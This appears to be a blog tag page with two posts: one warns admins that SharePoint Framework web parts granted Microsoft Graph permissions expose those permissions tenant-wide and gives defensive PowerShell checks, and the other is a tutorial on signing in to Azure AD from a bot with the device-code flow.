Contents tagged with Microsoft Graph

  • SharePoint Framework and Microsoft Graph access – convenient but be VERY careful

    Tags: SharePoint Framework, Office 365, Azure AD, Microsoft Graph, SharePoint Online, Security

    SharePoint Framework (SPFx) is a fantastic development model on top of (modern) SharePoint, for user interface extensibility, and it have evolved tremendously over the last year since it became general available. The framework is based on JavaScript extensibility in a controlled manner, compared to the older JavaScript injection mechanisms we used to extend (classic) SharePoint, that comes with a lot of power.

    Using SharePoint Framework our JavaScript has access to the whole DOM in the browser, meaning that we can do essentially what we want with the user interface – however, of course, we shouldn’t, only certain parts of the DOM are allowed/supported for modification. These areas are the custom client-side Web Parts we build (that squared box) or specific place holders (currently only two of them; top and bottom). For me that’s fine (although there’s a need for some more placeholders), but if you want to destroy the UX it is all up to you.

    In our client-side solutions we can call out to web services and fetch data and present to the user and even allow the end-user to manipulate this data. For a while now we’ve had limited access to Microsoft Graph, where Microsoft has done the auth plumbing for us, and now in the latest version (1.4.1) a whole new set of API’s to both call Microsoft Graph, with our own specified permission scopes, and even custom web services protected by Azure AD. Very convenient and you can build some fantastic (demo) solutions with this to show the power of UX extensibility in SharePoint Online.

    However – there are some serious security disadvantages that you probably don’t think or even care of if you’re a small business, a happy hacker or just want to build stuff. For me – designing and building solutions for larger enterprises this scares me and my clients…a lot!

    castle-1461009_640

    Some perspective

    Let’s take a step back and think about JavaScript injections (essentially SPFx is JavaScript injections – just with a fancier name and in a somewhat controlled way). It’s all very basic things, but from recent “social conversations” it seems like “people” forget.

    JavaScript running on a web page, has all the power that an end-user has, one could say even more power, since it can do stuff the user doesn’t see or is aware of. I already mentioned that JavaScript can modify the DOM – like hiding, adding or moving elements around. But it can also execute code, that is not necessarily visible. A good example is for instance to use Microsoft Application Insights to log the behavior of the user or the application – seems like a good thing in most cases (although I don’t think that many users of AppInsights understand how GDPR affects this – but that’s another discussion). We could also use JavaScript to call web services, using the information we have on the page to manipulate the state of the page, and also send data from our page to another page. All without the user noticing it. For good or for bad…let’s come back to the latter in a minute or so.

    No Script sites and the NoScript flag

    Before SharePoint Framework Microsoft introduced “No Script” sites to mitigate the issue with arbitrary JavaScript running in sites and pages. All modern Team sites, based on Office 365 Groups, and OneDrive sites are No Script sites. You can as an admin control the behavior of newly created SharePoint Sites using the settings in the SharePoint admin center (under settings):

    Bad settings for this...

    Depending on when your tenant was created (before or after the addition of this setting) your default settings may be different. My recommendation is, of course, to Prevent users from running custom scripts, to ensure that you don’t get some rogue scripts in there (see below).

    This setting can also be set on individual sites using the following SharePoint Online PowerShell command:

    Set-SPOsite https://contoso.sharepoint.com/sites/site 
    -DenyAddAndCustomizePages 0
    

    More information here: “Allow or prevent custom script

    This setting on a site not only affects JavaScript injections it also prohibits the use of Sandbox solutions and the use of SharePoint Designer – all good things!

    Script Editor Web Part – the wolf in sheep clothes

    “Our favorite” SharePoint extensibility mechanism, specifically for the citizen developers (or whatever you prefer calling them), has been the Script Editor Web Part (SEWP). As an editor of a site in SharePoint we can just drag the SEWP onto a page and add arbitrary scripts to get our job done and we’re done.

    The aforementioned No Script setting will make the Script Editor Web Part unavailable on these sites.

    The Script Editor Web Part does not exist in modern SharePoint. The whole idea with modern SharePoint and SPFx is that we (admins/editors) should have a controlled and managed way to add customizations to a site – and of course SEWP is on a collision course with that. Having that option would violate the whole idea.

    You can read much more about this in the SharePoint Patterns and Practices article called “Migrate existing Script Editor Web Part customizations to the SharePoint Framework”.

    But, there is now a “modern” version of the Script Editor Web Part available as a part of the SharePoint Patterns and Practices samples repository (which is a bit of a shocker to me). This solution is bypassing the whole idea of SharePoint Framework – controlled and governed JavaScript in SharePoint Online. And of course this is being used by a lot of users/tenants – since it’s simple and it works. If  you do use this solution you really should continue reading this…

    SharePoint Framework and Microsoft Graph = power?

    How does this relate to SharePoint Framework then? As I said, with SharePoint Framework we now have a very easy way to access the Microsoft Graph (and other Azure AD secured end-points) with pre-consented permission scopes. As a developer when you build a SharePoint Framework solution you can ask to be granted permissions to the Microsoft Graph and other resources. The admin grants these permissions in the new SharePoint Online admin center under API management.

    API Management in new SPO admin center

    For instance you want to build a Web Part that shows the e-mail or calendar on your portal page, you might want to have access to read and write information to tasks. The possibilities are endless and that is great, or is it?

    I think this is a huge area of concern. Imagine these user stories:

    As a user I would like to see my calendar events on my Intranet” – pretty common request I would say. This requires the SPFx Web Part developer to ask for permissions to read the users calendar.

    “As a user I would like to see and be able to update my Planner tasks” – another very common request. This requires the SPFx Web Part developer to ask for Read and Write access to all Groups (that’s just how it is…).

    Both these scenarios opens up your SharePoint Online solution for malicious attacks in a very severe way. Of course the actual permission has to be approved by an admin – but how many admins do really understand what’s happening when the business cries “we need this feature”.

    Note: this is not just a SharePoint Framework issue, but SPFx makes it so easy that you probably don’t see the forest for the trees. And this is also true for many of these “Intranet-in-a-box” vendors that has made their similar service to access mail/calendars etc from the Graph. It’s still JavaScript and if you allow a single user to add a script it can be misused.

    Rogue scripts

    Once you have granted permissions to the Microsoft Graph, by a single request from that fancy calendar Web Part, all other scripts in the whole tenant has those permissions. So your seemingly harmless Web Part has suddenly exposed your calendar for reading to any other Web Part. Assume that now the admin installs a weather Web Part (downloaded or acquired from a third party). This weather Web Part is now also allowed to read the users e-mail, even though it did not request it. And if that vendor goes rogue or already is, he or she can without the users knowing send all the calendar or e-mail details away to a remote server, while just displaying the weather. This requires some social engineering of course to make the admin install this Web Part. But what about allowing the modern Script Editor Web Part! And you piss an employee off…with just some simple JavaScript knowledge this user can then create a sweet looking cat-of-the-day web part or even a hidden one with the Modern Script Editor Web Part. Then send the boss to that page, and read all the bosses calendar events or e-mails, sending them to some random location somewhere…

    You still think this is a good idea?

    activist-anonymous-ddos-attack-38275

    And what about the second user story; where we need full read and write to all the groups, just to be able to manipulate tasks in Planner. It’s not much you can do, if you’re building this web part – you are opening up for so many more possibilities for “working with” groups and its associated features. This is not a SharePoint Framework thing, but a drawback in how Microsoft Graph works with permissions and the lack of contextual or fine-grained scopes in Azure AD. Same goes for reading/writing data from SharePoint sites – Azure AD/Microsoft Graph cannot restrict you to a single site or list – you have access to all of them.

    Remember how SharePoint Add-ins have Site Collection or list scoped permissions. I guess you all remember how we complained back then as well. That was some sweet days and we really want those features back. Well, we still have them – SharePoint add-ins are probably the best way to protect the users and your IP still…

    As I stated above, of course all SPFx solutions has to be added to the tenant app catalog – but, we also have the option of a site collection scoped catalog. So that’s another vector for insertion of seemingly nice solutions that can take advantage of the permissions you granted on a tenant level.

    The grey area between modern and classic sites

    Currently most SharePoint Online tenants is in a transition period between classic and modern sites. That is, they have built their SharePoint Online environment based on the “classic way” of building stuff, most often requiring script enabled sites. And now they want to transition to modern sites, without these scripting capabilities. Should they just add the new modern Script Editor Web Part or should they turn of scripting for all sites?

    If you turn this off I can almost guarantee that a lot of your sites will be useless. And in many cases your whole Intranet – specifically this happens with many of the “Intranet-in-a-box” vendor solutions. So be careful.

    So, what should I do?

    If you still think it is very valuable to build solutions with SPFx and Microsoft Graph the first thing you MUST do is to ensure that there is not a single site in your tenant with scripting enabled. You can do a quick check for this with this sample PowerShell command:

     get-sposite | 
      ?{$_.DenyAddAndCustomizePages -eq 'Disabled'}

    This will list all the site collections which still allow JavaScript execution using the Script Editor Web Part for instance. If there’s a single site in here, stop what you’re doing and don’t even consider granting SPFx any permissions.

    I wish we had this kind of notification and warning in the permission grant page in the new SharePoint Admin center. To make it very obvious for admins.

    Secondly, be very thoughtful on what solutions you are installing in your app catalog. Do you know the vendor, do you know their code, is their code hosted in a vendor CDN (warning signs – since they can update this without you knowing) etc? Do you have multiple vendors? Who have access to do this?

    So, you really need to do a proper due diligence of the code you let into your SharePoint Online tenant.

    A note on the CDN issue; when you add a SPFx solution to the app catalog all “registered” external script locations are listed. But this is not a guarantee. It’s only those that are registered in the manifest. As a developer you can request other resources dynamically without having them show up on this screen.

    Summary

    I hope that this gave you the chills, and that you start reflecting on these seemingly harmless weather web parts that you install. You as an admin, developer or purchaser of SharePoint Online customizations MUST think this over.

    1. Do we have a plan to move from script enabled sites to ALL sites with no custom scripts enabled
    2. Do we have the knowledge and skill to understand what our developers and vendors are adding to our SharePoint Online tenant
    3. Do we understand the specific permission requirements needed

    I also hope (and know) that the SharePoint Framework product team listens, this is an area which needs to be addressed. We want to build these nicely integrated solutions, but we cannot do it on behalf of security concerns. And it’s NOT about security in SharePoint or SharePoint Framework it is about how web browsers work. What we need is:

    1. Visibility – make it visible to the admins what is really happening in their tenant; script enabled sites, SEWP instances etc.
    2. Isolation – we need to be able to isolate our web parts, so that they and their permissions scopes cannot be intercepted or misused. In the web world I guess that Iframes is the only solution
    3. Granularity - Azure AD permission granularity – it’s not sustainable to give your applications these broad permissions (Group Write All). I want to give my app access to write in one Planner plan only and not in all groups.

    Thanks for reaching the end! I oversimplified some parts, but if you have any concerns, questions or issues with my thinking – don’t hesitate to debate, confront, question or agree with this post.

  • Using Device Codes to authenticate Bots with Azure AD

    Tags: Bot Framework, Microsoft Teams, npm, Microsoft Azure, Microsoft Graph, Azure AD

    I’ve been building chat-bots for a while now and I’m seeing more and more requests of building these bots for enterprises. For bots targeted at the enterprise, perhaps being hosted in Microsoft Teams, one of the first requirements is that they should get data from their internal systems and most specifically from Office 365, through the Microsoft Graph. The problem here is that we need to authenticate and authorize the user, through Microsoft Azure AD, to be able to access these resources. A Microsoft Bot Framework bot, does not inherit the credentials or security tickets from the application the bot is being invoked from, so we need handle this ourselves. For instance, even though you have logged in to Microsoft Teams, or Skype for Business or your Intranet – your security token cannot (and should not) be passed to the Bot.

    This is not mission impossible, and there are multiple ways of implementing this. For instance if you’re building Bot Framework bots using .NET you can use the AuthBot and with node.js there’s the botauth module. There’s also other (a bit weird and specialized) ways of doing this by using the backchannel.

    All of these are custom implementations with either sending an already existing access token to the bot or using home brewed magic number generators. But, there’s a much simpler way of doing this – using the native and built-in features of the Azure Active Directory Authentication Library (ADAL), specifically using the OAuth 2.0 Device Flow.

    In this post I will demonstrate how to create a bot from scratch and use the device flow to sign in and get data from Microsoft Graph. It will all be built using node.js and TypeScript – but the procedure is the same for any kind of environment.

    Creating the bot

    First of all we need to create a bot using the Bot Framework portal. Give the bot a name, handle, description and specify the messaging endpoint. You can use localhost for testing but in the end you should have a publically available URL to be able to use it in the different Bot channels. In this sample we need to make sure that the messaging endpoint ends with /api/messages. Then you need to create a Microsoft App ID and a password – just follow the wizard and copy and take a note of the ID and specifically the password – you will only see it once. Once you’re done, save your bot.

    Configuring the App platform for the bot

    The bot created in the Bot Framework portal, is essentially an Application in the Microsoft Application Registration Portal. In order to use this Application ID with Azure AD and Microsoft Graph, we need to log in to that portal and find our newly registered bot and then add a platform for it. In this case let’s add a Native Application. You don’t have to configure it or anything, it just needs to have a platform.

    Setting the platform for the App

    In this portal you can also add the delegated permissions for your bot, under Microsoft Graph Permissions. For the purpose of this demo we only need the User.Read permissions.

    Let’s write some code

    Next step is to actually start writing some code. This will be done in node.js, using TypeScript and a set of node modules. The most important node modules used in this demo are:

    • webpack – bundles our TypeScript files
    • ts-loader – webpack plugin that transpiles TypeScript to JavaScript
    • express – node.js webserver for hosting our Bot end-point
    • adal-node – ADAL node.js implementation
    • @microsoft/microsoft-graph-client – a Microsoft Graph client
    • botbuilder – Bot Framework bot implementation

    All code in this sample are found in this Github repo: https://github.com/wictorwilen/device-code-bot. To use it, just clone the repo, run npm install. Then to be able to run it locally or debug it you can add a file called .env and in that file add your Application ID and password as follows:

    MICROSOFT_APP_ID=fa781336-3114-4aa2-932e-44fec5922cbd
    MICROSOFT_APP_PASSWORD=SDA6asds7aasdSDd7

    The hosting of the bot, using express, is defined in the /src/server.ts file. For this demo this file contains nothing specific, part from starting the implementation of the bot – which is defined in /src/devicecodebot.ts.

    In the bot implementation you will find a constructor for the bot that creates two dialogs; the default dialog and a dialog for sign-ins. It will also initialize the ADAL cache.

    constructor(connector: builder.ChatConnector) {
        this.Connector = connector;
        this.cache = new adal.MemoryCache()
    
        this.universalBot = new builder.UniversalBot(this.Connector);
        this.universalBot.dialog('/', this.defaultDialog);
        this.universalBot.dialog('/signin', this.signInDialog)
    }

    The implementation of the default dialog is very simple. It will just check if we have already logged in, but in this demo we will not set that value, so a login flow will always be started by starting the sign-in dialog.

    The sign-in dialog will create a new ADAL AuthenticationContext and then use that context to acquire a user code.

    var context = new AuthenticationContext('https://login.microsoftonline.com/common', 
      null, this.cache);
        context.acquireUserCode('https://graph.microsoft.com', 
          process.env.MICROSOFT_APP_ID, '', 
          (err: any, response: adal.IUserCodeResponse) => {
            ...
    });

    The result from this operation (IUserCodeResponse) is an object with a set of values, where we in this case should pay attention to:

    • userCode – the code to be used by the user for authentication
    • message – a friendly message containing the verification url and the user code
    • verificationUrl – the url where the end user should use the user code (always aka.ms/devicelogin)

    We use this information to construct a Bot Builder Sign-In Card. And send it back to the user:

    var dialog = new builder.SigninCard(session);
    dialog.text(response.message);
    dialog.button('Click here', response.verificationUrl);
    var msg = new builder.Message();
    msg.addAttachment(dialog);
    session.send(msg);

    This allows us to from Bot Framework channel invoke the authorization flow for the bot. The end-user should click on the button, which opens a web browser (to aka.ms/devicelogin) and that page will ask for the user code. After the user entered the user code, the user will be asked to authenticate and if it is the first time also consent to the permissions asked for by the bot.

    In our code we then need to wait for this authorization, authentication and consent to happen. That is done as follows:

    context.acquireTokenWithDeviceCode('https://graph.microsoft.com',
       
    process.env.MICROSOFT_APP_ID, response, 
      (err: any, tokenResponse: adal.IDeviceCodeTokenResponse) => {
        if (err) {
          session.send(DeviceCodeBot.createErrorMessage(err));
          session.beginDialog('/signin')
        } else {
            session.userData.accessToken = tokenResponse.accessToken;
            session.send(`Hello ${tokenResponse.givenName} ${tokenResponse.familyName}`);
            ...
        }
    });	

    The result from this operation can of course fail and we need to handle that, in this case just sending the error as a message and restart the sign-in flow. If successful we will get all the data we need to continue (IDeviceCodeTokenResponse) such as access-token, refresh-token, user-id, etc. In a real world scenario you should of course store the refresh token, in case the access token times out. And it is also here that we potentially tells our bot that the user is signed in redirects subsequent dialogs to what we want to do.

    Now we can use this access token to grab some stuff from the Microsoft Graph. The following code, with a very simplistic approach, where wo do not handle timed out access tokens, we just grab the title of the user and sends it back to the user.

    const graphClient = MicrosoftGraph.Client.init({
        authProvider: (done: any) => {
            done(null, session.userData.accessToken);
        }
    });
    graphClient.
        api('/me/jobTitle').
        version('beta').
        get((err: any, res: any) => {
            if (err) {
                session.send(DeviceCodeBot.createErrorMessage(err));
            } else {
                session.endDialog(`Oh, so you're a ${res.value}`);
            }
        });
        }
    });

    Run the application

    To run the application first we need to transpile and bundle it using webpack like this:

    npm run-script build

    The we start the express server like this:

    npm run-script run

    To test it locally we need to use the Bot Framework emulator. Download it, run it and configure it to run at http://localhost:3007/api/messages. Type anything in the emulator to start the sign-in experience

    Testing the bot with the Bot Framework emulator

    As soon as you’ve written something the Sign-In card will be displayed. When you click on the button a browser window will open and you will be asked to type the code. When you’ve done that you will be asked to sign-in and consent. And shortly after that the bot will come alive again and type the users name and if all works well, also the job title of the user.

    Consenting the device code bot

    If you decide to publish your bot (for instance to Azure, all the necessary files are in the Github repo to Git publish it to Azure) you can also use the bot in other channels, for instance Skype:

    The device code bot in Skype

    Summary

    As you’ve now seen. It is very easy to create a simple and elegant sign-in flow for your bots, without sacrificing any security, and all using standard features of ADAL and OAuth. This will nicely work with any Azure AD accounts, with MFA or not.

About Wictor...

Wictor Wilén is the Nordic Digital Workplace Lead working at Avanade. Wictor has achieved the Microsoft Certified Architect (MCA) - SharePoint 2010, Microsoft Certified Solutions Master (MCSM) - SharePoint  and Microsoft Certified Master (MCM) - SharePoint 2010 certifications. He has also been awarded Microsoft Most Valuable Professional (MVP) for seven consecutive years.

And a word from our sponsors...